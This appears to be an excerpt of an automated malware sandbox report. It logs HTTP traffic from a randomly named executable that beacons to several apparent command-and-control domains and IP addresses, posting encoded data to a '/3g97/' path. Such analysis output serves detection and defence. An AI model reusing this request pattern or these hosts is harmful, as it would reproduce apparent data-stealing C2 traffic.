                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
Apr 24, 2024 07:26:52.731362104 CEST | 451 | IN
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49749 | 172.217.16.36 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:26:55.165807009 CEST | 454 | OUT | GET /3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:26:55.586297035 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:55 GMT
                                                                                              Connection: close
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
Apr 24, 2024 07:26:55.586327076 CEST | 451 | IN
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49750 | 203.161.46.103 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:02.680174112 CEST | 728 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=rcuLxzGVhPi9TJ+fHxLHmf+Z2LoXHUxRRbcrvfGwnUymcuewf7b7QLZi7hoeLDYSzeRbzcUseczPhv8XmHfsR3x8vKPpQRfDvDeqNhyeTvZ9K8KcsonVEShGhAT2nS4xN+fHPqhvtnSYigCe3iPYY3l+LM4SQMNStbfnhRp6LE8YOzNM2yeCp5+0I+B57esJpg==
Apr 24, 2024 07:27:02.859771967 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:02 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 203.161.46.103 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:05.371216059 CEST | 748 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=rcuLxzGVhPi9RoOfBQLHk/+YvLoXN0xdRbArvfugknamcPuwe5z7VLZixBofFjYjzeNtzdosecXPhuMXhwLzLHx6jqPraxfDvDeqNiPJTvB9KoOctJnaaChJ2wT2ty49N+ffPuAKtiWYikKe32bXW3l4V85HDNcarY2ThX9GInUzP1cWnD/V75aHV5IN2dRAyi51ytFeomnaVu7ZwuQ4T90=
Apr 24, 2024 07:27:05.556513071 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:05 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 203.161.46.103 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:08.074906111 CEST | 10830 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:08.252882004 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:08 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 203.161.46.103 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:10.777631998 CEST | 455 | OUT | GET /3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18= HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:10.956478119 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:10 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 162.240.81.18 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:16.511687040 CEST | 749 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=v8aJ6qxED4WtCUxTHiOAVenTBOA+Sl6oN1JO/f2WoX28GdGN6TJO31GIqHay0CYkoC8J/PtjYjsscAENdKO0ztpPucSESuSBMxR+Lz2xQhFw5W4tnz6Vvcr2axFLQg8trhCZtrMXmpv06+uPm0f0ywd1UQF8ZIffTbBBgwaubyVbhbl870WPozIZyiTvAOxNGA==
Apr 24, 2024 07:27:16.690617085 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:16 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Apr 24, 2024 07:27:16.690632105 CEST | 1289 | IN |
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Apr 24, 2024 07:27:16.690645933 CEST | 1245 | IN |
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 162.240.81.18 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:20.740777016 CEST | 769 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=v8aJ6qxED4WtB0hTFDOAEOnQEOA+ZF60N1FO/eiGplC8G92N7SJOw1GI4na36iYvoCwn/KVjYjQscFoNe5m3y9pNm8SGP+SBMxR+LwKXQlpw5nItoxSWxMrpNBFLdA8prhD6tpoxmqX068GPnlf3pAcwZwEoIJiudOM/oRCgc2BLp90mqF3Y6zsqvlabNNMEdJfao5VFqCOgbhpnHleWd5o=
Apr 24, 2024 07:27:20.921850920 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:20.921866894 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:20.921885967 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              15 | 192.168.2.4 | 49756 | 162.240.81.18 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:27:23.451829910 CEST | 10851 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:27:23.632837057 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:23.632946014 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:23.633291960 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              16 | 192.168.2.4 | 49757 | 162.240.81.18 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:27:26.171804905 CEST | 462 | OUT | GET /3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:27:26.353187084 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:26.353208065 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:26.353230953 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              17 | 192.168.2.4 | 49758 | 217.160.0.111 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:27:32.176814079 CEST | 728 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 6b 75 45 56 4c 4d 77 65 55 6f 44 74 67 30 4b 77 69 63 72 34 58 2f 4a 48 63 66 70 78 6e 4d 4c 5a 6a 55 6d 6b 4c 48 72 35 6c 39 59 32 6e 36 6e 51 51 38 56 45 52 4a 55 53 75 37 55 43 50 63 47 38 2b 62 32 7a 6d 48 62 76 71 47 51 7a 63 38 52 2f 56 5a 63 55 46 78 55 6b 31 35 55 68 59 48 78 2b 6c 6d 48 76 44 72 6d 5a 68 67 6d 34 71 53 6c 6e 6a 4f 65 79 48 44 66 4d 4a 4c 43 41 34 77 6a 50 63 31 78 2f 6d 55 36 4f 79 61 68 6c 73 62 6e 6b 67 35 42 43 39 56 6a 48 78 55 4c 62 41 7a 61 4a 6b 47 4b 6a 62 6a 71 77 46 36 4c 4c 63 72 43 55 59 78 51 2f 44 32 71 49 43 58 30 51 6f 36 55 6f 59 51 3d 3d
                                                                                              Data Ascii: 12l42=kuEVLMweUoDtg0Kwicr4X/JHcfpxnMLZjUmkLHr5l9Y2n6nQQ8VERJUSu7UCPcG8+b2zmHbvqGQzc8R/VZcUFxUk15UhYHx+lmHvDrmZhgm4qSlnjOeyHDfMJLCA4wjPc1x/mU6Oyahlsbnkg5BC9VjHxULbAzaJkGKjbjqwF6LLcrCUYxQ/D2qICX0Qo6UoYQ==
                                                                                              Apr 24, 2024 07:27:32.482180119 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:32 GMT
                                                                                              Server: Apache
                                                                                              Content-Encoding: gzip
Apr 24, 2024 07:27:32.482213020 CEST | 846 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 217.160.0.111 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:35.011996031 CEST | 748 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:35.320136070 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:35 GMT
                                                                                              Server: Apache
                                                                                              Content-Encoding: gzip
Apr 24, 2024 07:27:35.320178986 CEST | 846 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
